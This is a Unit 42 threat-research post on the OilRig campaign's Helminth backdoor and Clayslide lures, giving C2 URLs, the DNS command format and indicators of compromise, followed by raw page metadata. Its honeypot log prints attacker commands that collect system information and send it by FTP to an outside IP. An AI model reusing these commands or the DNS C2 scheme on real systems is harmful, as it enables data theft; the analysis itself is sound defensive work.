<h1>OilRig Malware Campaign Updates Toolset and Expands Targets</h1>
<p>Josh Grunzweig and Robert Falcone, Unit 42 (Palo Alto Networks), published 4 October 2016. Canonical URL: <a href="https://unit42.paloaltonetworks.com/ja/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/">https://unit42.paloaltonetworks.com/ja/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/</a></p>

<h2>Summary</h2>
<p>Since our initial analysis of <a href="https://blog.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">the OilRig campaign in May 2016</a>, we have continued to monitor the group for new activity. In recent weeks we have found that the group is actively updating both the Helminth backdoor it deploys against victims and the Clayslide delivery documents. Its targeting has also widened: beyond organizations in Saudi Arabia, we now see companies in Qatar and government agencies in Turkey, Israel and the United States.</p>

<h3>Expanding Targets</h3>
<p>The group behind the OilRig campaign continues to compromise victims with spear-phishing emails that carry a Microsoft Excel document as the attachment. In one example, the email below was sent to a Turkish government agency; the lure claimed to be a new portal login for an airline's website. (The sender shown in the figure may be spoofed.)</p>
<figure>
<img src="https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_1.png" alt="Figure 1. Phishing email sent to a Turkish government agency" width="500" height="342" />
<figcaption>Figure 1. Phishing email sent to a Turkish government agency</figcaption>
</figure>
<p>When users.xls is opened and macros are enabled, the following decoy document is displayed to the victim.</p>
<figure>
<img src="https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_2.png" alt="Figure 2. Contents of the malicious Helminth XLS file" width="500" height="426" />
<figcaption>Figure 2. Contents of the malicious Helminth XLS file</figcaption>
</figure>
<p>Exactly the same document content was used with Helminth samples that targeted government agencies in several countries. The following file names were observed in those attacks:</p>
<ul>
<li>Help-Yemen.xls</li>
<li>xls</li>
</ul>
<p>Beyond these examples, several organizations in Qatar were targeted earlier this year by spear-phishing emails carrying Helminth samples. In those cases the documents that carried the malicious macro code were tailored to the receiving organization, and in one case the email was sent from a partner organization that already had a relationship with the recipient.</p>

<h3>Toolset Updates</h3>
<p>Over the past several months we have identified numerous changes to the malware used by the OilRig attackers. In the past five months we identified four distinct variants, each of which drops files under different names when it runs. The dropped VBS and PowerShell files use the following names. (FireEye was notified that its name was being used in this malware when the variant was discovered.)</p>
<ul>
<li>update.vbs / dns.ps1</li>
<li>fireeye.vbs / fireeye.ps1</li>
<li>upd.vbs / dn.ps1</li>
<li>komisova.vbs / komisova.ps1</li>
</ul>
<p>The timeline below shows the prevalence of each variant.</p>
<figure>
<img src="https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_3.png" alt="Figure 3. Helminth variants over time" width="500" height="334" />
<figcaption>Figure 3. Helminth variants over time</figcaption>
</figure>
<p>As the timeline shows, at the end of May 2016 the attackers switched from the update.vbs variant to the fireeye.vbs variant. More recently the upd.vbs variant appeared; it looks like a version under active development, and it contains artifacts such as code comments that we examine later in this post. Most recently, the komisova.vbs variant has been seen in use.</p>

<h3>VBScript Changes Between Variants</h3>
<p>Overall, the changes to the dropped VBS file between variants are minimal. As a refresher, the VBS script is responsible for communicating with the remote server over HTTP. It repeatedly tries to download a file from the server and, if one is available, executes it; the output of that file is then uploaded in a separate HTTP request. The VBS script also executes the PowerShell script dropped by the Clayslide Excel document.</p>
<p>The differences between the observed variants are generally slight; the main one is the set of domains and IP addresses used. The URLs used by each variant are listed below.</p>
<h4>update.vbs</h4>
<ul>
<li>hxxp://winodwsupdates[.]me/counter.aspx?req=</li>
<li>hxxp://go0gIe[.]com/sysupdate.aspx?req=</li>
</ul>
<h4>fireeye.vbs</h4>
<ul>
<li>hxxp://update-kernal[.]net/update-index.aspx?req=</li>
<li>hxxp://upgradesystems[.]info/upgrade-index.aspx?req=</li>
<li>hxxp://yahoooooomail[.]com/update-index.aspx?req=</li>
<li>hxxp://googleupdate[.]download/update-index.aspx?req=</li>
</ul>
<h4>upd.vbs</h4>
<ul>
<li>hxxp://83.142.230[.]138:7020/update.php?req=</li>
</ul>
<h4>komisova.vbs</h4>
<ul>
<li>hxxp://googleupdate[.]download/update-index.aspx?req=</li>
</ul>
<p>A couple of points are worth noting. The komisova.vbs variant uses one of the same URLs seen in the fireeye.vbs variant, and that domain appeared only in the most recent fireeye.vbs samples. It is therefore very likely that those fireeye.vbs samples were used during the transition period in which the attackers switched to komisova.</p>
<p>We noted above that the Excel file that drops upd.vbs is probably a development version. Supporting this is the fact that it connects to a bare IP address on a non-standard port. One particularly interesting feature of this IP address is its association with the Remexi report <a href="https://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf">published by Symantec in late 2015</a>. This is consistent with previously reported evidence suggesting that an Iran-based attacker is behind these attacks.</p>
<figure>
<img src="https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_4.png" alt="Figure 4. Relationship between the IP address and Remexi (as shown in PassiveTotal)" width="500" height="214" />
<figcaption>Figure 4. Relationship between the IP address and Remexi (as shown in PassiveTotal)</figcaption>
</figure>
<p>The underlying code of upd.vbs is considerably cleaner than that of the other variants, as shown below, which is further evidence that it is under active development.</p>
<figure>
<img src="https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_5.png" alt="Figure 5. Code of the upd.vbs variant" width="500" height="253" />
<figcaption>Figure 5. Code of the upd.vbs variant</figcaption>
</figure>
<p>Another minor difference in the upd.vbs variant is where downloaded files are stored. The other three variants place downloaded files in a subfolder under %PUBLIC%/Libraries, whereas this variant places them in a subfolder under %USERPROFILE%/AppData/Local/Microsoft/Media/.</p>

<h3>PS1 Changes Between Variants</h3>
<p>Like the VBS file, the PS1 file communicates with a remote server, but it uses DNS rather than HTTP. Commands and file paths are received from the remote server and executed, and the output of those commands is uploaded through further DNS requests. For a detailed analysis of this mechanism, see our previous <a href="https://blog.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/">OilRig blog post</a>. The dns, fireeye and komisova PS1 variants differ only in fairly minor ways; the dn.ps1 variant, however, appears to have been substantially updated. In addition to those updates, the file is heavily commented, further evidence that this particular file was under active development.</p>
<figure>
<img src="https://www.paloaltonetworks.jp/content/dam/pan/ja_JP/Images/blog/OilRig_6.png" alt="Figure 6. Beginning of the dn.ps1 variant" width="500" height="861" />
<figcaption>Figure 6. Beginning of the dn.ps1 variant</figcaption>
</figure>
<p>The dn.ps1 variant issues DNS queries of the following forms:</p>
<pre>rne_[victim_id]_[random].hostname
rd_[victim_id]_[filename]_[file_size]_[random].hostname
bne_[victim_id]_[random].hostname
bd_[victim_id]_[filename]_[file_size]_[random].hostname
u_[victim_id]_[filename]_[byte_position]_[random].hostname</pre>
<p>In these queries, the 'rne' command asks the remote server whether a regular file is available for download. If one is, the server answers 'OK' followed by the file name, and the malware then issues 'rd' commands to download the file itself.</p>
<p>The 'bne' and 'bd' commands follow the same flow, but only for batch files. While downloading a file, the malware watches for the string 'EOFEOF', which marks the end of the data stream.</p>
<p>The 'u' command uploads data produced by the supplied file or script. The data is uploaded in small pieces, with the 'byte_position' field holding the current offset within the file being uploaded.</p>
<p>After running this particular variant for several days we were able to entice the attackers into interacting with our honeypot. Parsing the collected PCAP with a Python script produced the following (trimmed for brevity).</p>
<pre>[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1988996938.shalaghlagh.tk | Type: TXT
[+] Response TXT: NO
[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1404872126.shalaghlagh.tk | Type: TXT
[+] Response TXT: OK1.txt
[*] Filename: 1.txt
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_0_840824109.shalaghlagh.tk | Type: TXT
[+] Response TXT: aG9zdG5hbWU=
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_1_-_txt_8_1643283204.shalaghlagh.tk | Type: TXT
[+] Response TXT: EOFEOF
[*] Decoded Stream: hostname
[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1534172028.shalaghlagh.tk | Type: TXT
[+] Response TXT: OK2.txt
[*] Filename: 2.txt
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_0_579093369.shalaghlagh.tk | Type: TXT
[+] Response TXT: c3lzdGVtaW5mbw==
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_2_-_txt_10_1446367320.shalaghlagh.tk | Type: TXT
[+] Response TXT: EOFEOF
[*] Decoded Stream: systeminfo
[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1130109782.shalaghlagh.tk | Type: TXT
[+] Response TXT: NO
[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1735654322.shalaghlagh.tk | Type: TXT
[+] Response TXT: OK3.txt
[*] Filename: 3.txt
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_0_122829473.shalaghlagh.tk | Type: TXT
[+] Response TXT: c3RhcnQgZnRwIC1BIDg3LjExNy4yMDQuMTQz
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_3_-_txt_27_1524268269.shalaghlagh.tk | Type: TXT
[+] Response TXT: EOFEOF
[*] Decoded Stream: start ftp -A 87.117.204.143
[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_117849324.shalaghlagh.tk | Type: TXT
[+] Response TXT: NO
[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_926300114.shalaghlagh.tk | Type: TXT
[+] Response TXT: OK5.txt
[*] Filename: 5.txt
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_0_1307455992.shalaghlagh.tk | Type: TXT
[+] Response TXT: d2hvYW1pPmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0KaXBjb25maWc_PmM6XHdpbmRvd3NcdGVtcFx0LnR4dA0Kc3lzdGVtaW5mbz4_Yzpcd2luZG93c1x0ZW1wXHQudHh0DQplY2hvIFBVVCBjOlx3aW5kb3dzXHRlbXBcdC50eHQgfCBmdHAgLUEgODcuMTE3LjIwNC4x
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_150_2072649310.shalaghlagh.tk | Type: TXT
[+] Response TXT: NDM=
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_5_-_txt_152_1977692291.shalaghlagh.tk | Type: TXT
[+] Response TXT: EOFEOF
[*] Decoded Stream: whoami&gt;c:\windows\temp\t.txt
ipconfig&gt;&gt;c:\windows\temp\t.txt
systeminfo&gt;&gt;c:\windows\temp\t.txt
echo PUT c:\windows\temp\t.txt | ftp -A 87.117.204.143
[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_155964816.shalaghlagh.tk | Type: TXT
[+] Response TXT: NO
[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_1003791024.shalaghlagh.tk | Type: TXT
[+] Response TXT: OK7.txt
[*] Filename: 7.txt
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_0_1649905845.shalaghlagh.tk | Type: TXT
[+] Response TXT: c3RhcnQgZnRwIC1BIDgzLjE0Mi4yMzAuMTM4
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk | Type: TXT
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_7_-_txt_27_65323037.shalaghlagh.tk | Type: TXT
[+] Response TXT: EOFEOF
[*] Decoded Stream: start ftp -A 83.142.230.138
[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_1205170103.shalaghlagh.tk | Type: TXT
[+] Response TXT: NO
[+] Query: bne_DNSTRWIN-LJLV2NKIOKPR1009969912_779542217.shalaghlagh.tk | Type: TXT
[+] Response TXT: OK11.txt
[*] Filename: 11.txt
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_0_1213525986.shalaghlagh.tk | Type: TXT
[+] Response TXT: QGVjaG8gb2ZmDQplY2hvIDE=
[+] Query: bd_DNSTRWIN-LJLV2NKIOKPR1009969912_11_-_txt_17_651256114.shalaghlagh.tk | Type: TXT
[+] Response TXT: EOFEOF
[*] Decoded Stream: @echo off
echo 1
[+] Query: rne_DNSTRWIN-LJLV2NKIOKPR1009969912_816831185.shalaghlagh.tk | Type: TXT
[+] Response TXT: NO</pre>
<p>As can be seen, a number of interesting commands were received from the attackers, including attempts to reach a remote FTP server and various reconnaissance commands. The commands arrived at seemingly random intervals, which suggests they were issued by a live operator rather than an automated system.</p>

<h2>Conclusion</h2>
<p>The attackers using the Helminth and Clayslide malware families continue to target high-value companies and organizations around the world with customized malware. As the files described in this post show, the malware is under active development and is continually being updated and improved. Although the deployed malware is not terribly sophisticated, it uses techniques such as DNS command and control (C2) that can go unnoticed in many environments.</p>
<p>Palo Alto Networks customers are protected from this threat as follows:</p>
<ul>
<li>WildFire identifies all Helminth and Clayslide samples as malicious.</li>
<li>Domains identified as command and control servers are flagged as malicious.</li>
<li>The AutoFocus tags <a href="https://autofocus.paloaltonetworks.com/#/tag/Unit42.Helminth">Helminth</a> and <a href="https://autofocus.paloaltonetworks.com/#/tag/Unit42.Clayslide">Clayslide</a> can be used to track this group.</li>
</ul>

<h3>Indicators of Compromise</h3>
<h4>SHA256</h4>
<p>F04CF9361CF46BFF2F9D19617BBA577EA5F3AD20EA76E1F7E159701E446364FC<br />
E2EC7FA60E654F5861E09BBE59D14D0973BD5727B83A2A03F1CECF1466DD87AA<br />
31DB0841C3975BE5395F13C894B7E444D150CC701487B756FFF43CE78D98B1E6<br />
C3C17383F43184A29F49F166A92453A34BE18E51935DDBF09576A60441440E51<br />
C6437F57A8F290B5EC46B0933BFA8A328B0CB2C0C7FBEEA7F21B770CE0250D3D<br />
5A2C38BE89AC878D28080A7465C4A3F8708FB414B811511B9D5AE61A47593A69<br />
BD0920C8836541F58E0778B4B64527E5A5F2084405F73EE33110F7BC189DA7A9<br />
90639C7423A329E304087428A01662CC06E2E9153299E37B1B1C90F6D0A195ED<br />
528D432952EF879496542BC62A5A4B6EEE788F60F220426BD7F933FA2C58DC6B<br />
3772D473A2FE950959E1FD56C9A44EC48928F92522246F75F4B8CB134F4713FF<br />
F3856C7AF3C9F84101F41A82E36FC81DFC18A8E9B424A3658B6BA7E3C99F54F2<br />
0CD9857A3F626F8E0C07495A4799C59D502C4F3970642A76882E3ED68B790F8E<br />
80161DAD1603B9A7C4A92A07B5C8BCE214CF7A3DF897B561732F9DF7920ECB3E<br />
D874F513A032CCB6A5E4F0CD55862B024EA0BEE4DE94CCF950B3DD894066065D<br />
5E9DDB25BDE3719C392D08C13A295DB418D7ACCD25D82D020B425052E7BA6DC9<br />
299BC738D7B0292820D99028289280BA24D7FB985851D9C74060AF7950CECEF0<br />
2E226A0210A123AD828803EB871B74ECBDB702FC4BABD9FF786231C486FF65E0<br />
F1DE7B941817438DA2A4B7284BC56C291DB7312E3BA5E2397B3621811A816AA3<br />
65920EAEA00764A245ACB58A3565941477B78A7BCC9EFAEC5BF811573084B6CF<br />
742A52084162D3789E196FB5FF6F8E2983147CD914088BD5F9ED363D7A5B0DF0<br />
4E5B85EA68BF8F2306B6B931810AE38C8DFF3679D78DA1AF2C91032C36380353<br />
36D4B4B018EC78A79F3C06DC30EC77C250307628A7631F6B5B5995E797D0674F<br />
005DDE45A6F1D9B2A254E71F89F12AB0DFAAA48D081F5C0A434800BD5C327086<br />
2C4BCAB135BF1846684B598E66E3F51443F70F9E8D0544F3417774CBE907E8EF<br />
C4FBC723981FC94884F0F493CB8711FDC9DA698980081D9B7C139FCFFBE723DA<br />
CFFC694ACE3E1547007AE00437536F2A88BA60179C51F23228E696FB02AFDC86<br />
0B9437DD87A3C24ED7D200F9B870D69F9B7AD918C51325C11444DF8BC6FB97BA<br />
903B6D948C16DC92B69FE1DE76CF64AB8377893770BF47C29BF91F3FD987F996<br />
8BFBB637FE72DA5C9AEE9857CA81FA54A5ABE7F2D1B061BC2A376943C63727C7<br />
9C0A33A5DC62933F17506F20E0258F877947BDCD15B091A597EAC05D299B7471<br />
93940B5E764F2F4A2D893BEBEF4BF1F7D63C4DB856877020A5852A6647CB04A0<br />
0EC288AC8C4AA045A45526C2939DBD843391C9C75FA4A3BCC0A6D7DC692FDCD1<br />
089BF971E8839DB818AC462F53F82DAED523C413BFC2E01FB76DD70B37162AFE<br />
D808F3109822C185F1D8E1BF7EF7781C219DC56F5906478651748F0ACE489D34<br />
3986D54B00647B507B2AFD708B7A1CE4C37027FB77D67C6BC3C20C3AC1A88CA4<br />
1B2FEE00D28782076178A63E669D2306C37BA0C417708D4DC1F751765C3F94E1<br />
662C53E69B66D62A4822E666031FD441BBDFA741E20D4511C6741EC3CB02475F<br />
F5A64DE9087B138608CCF036B067D91A47302259269FB05B3349964CA4060E7E<br />
A787C0E42608F9A69F718F6DCA5556607BE45EC77D17B07EB9EA1E0F7BB2E064<br />
4B5112F0FB64825B879B01D686E8F4D43521252A3B4F4026C9D1D76D3F15B281<br />
3AF6DFA4CEBD82F48B6638A9757730810707D79D961DDE1B72D3768E972E6184</p>
<h4>C2 Servers</h4>
<p>shalaghlagh[.]tk<br />
go0gIe[.]com<br />
winodwsupdates[.]me<br />
update-kernal[.]net<br />
googleupdate[.]download<br />
yahoooooomail[.]com<br />
upgradesystems[.]info</p>
<h4>File Paths</h4>
<p>%PUBLIC%/Libraries/dn<br />
%PUBLIC%/Libraries/up<br />
%USERPROFILE%/AppData/Local/Microsoft/Media/up<br />
%USERPROFILE%/AppData/Local/Microsoft/Media/dn</p>
-->","yoast_head_json":{"title":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","description":"\u6982\u8981","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","og_locale":"ja_JP","og_type":"article","og_title":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","og_description":"\u6982\u8981","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","og_site_name":"Unit 42","article_published_time":"2016-10-04T20:10:37+00:00","article_modified_time":"2020-04-08T08:48:28+00:00","og_image":[{"width":650,"height":300,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","type":"image\/jpeg"}],"author":"Josh Grunzweig, Robert Falcone","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/"},"author":{"name":"Josh 
Grunzweig","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/946b9392c26b4a1a91f6e4eeb2889600"},"headline":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","datePublished":"2016-10-04T20:10:37+00:00","dateModified":"2020-04-08T08:48:28+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/"},"wordCount":884,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","keywords":["Clayside","Helminth","OilRig","OilRig attacks","Spear Phishing"],"articleSection":["Threat Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/","name":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimag
e"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","datePublished":"2016-10-04T20:10:37+00:00","dateModified":"2020-04-08T08:48:28+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/946b9392c26b4a1a91f6e4eeb2889600"},"description":"\u6982\u8981","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2016\/09\/unit42-web-banner-650x300.jpg","width":650,"height":300},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"OilRig\u30de\u30eb\u30a6\u30a7\u30a2\u653b\u6483\u6d3b\u52d5\u3001\u30c4\u30fc\u30eb\u30bb\u30c3\u30c8\u3092\u66f4\u65b0\u3057\u6a19\u7684\u3092\u62e1\u5927"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto 
Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/946b9392c26b4a1a91f6e4eeb2889600","name":"Josh Grunzweig","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Josh Grunzweig"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/joshgruznweig\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106117","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/21"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=106117"}],"version-history":[{"count":3,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106117\/revisions"}],"predecessor-version":[{"id":106119,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/106117\/revisions\/106119"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/103240"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\
/wp\/v2\/media?parent=106117"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=106117"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=106117"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=106117"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=106117"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}